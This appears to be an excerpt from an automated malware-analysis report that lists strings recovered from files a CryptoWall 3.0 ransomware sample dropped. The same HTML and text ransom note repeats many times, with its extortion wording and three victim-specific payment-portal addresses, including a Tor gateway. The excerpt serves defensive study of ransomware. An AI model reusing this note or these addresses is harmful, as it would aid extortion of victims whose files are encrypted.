on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt33.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt37.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt34.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt26.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt22.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt223.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html383.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt28.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html375.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html302.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html278.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html44.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt418.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html367.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt360.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html414.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html71.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt353.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt365.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt394.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html177.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt77.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt57.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt256.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html237.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html296.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
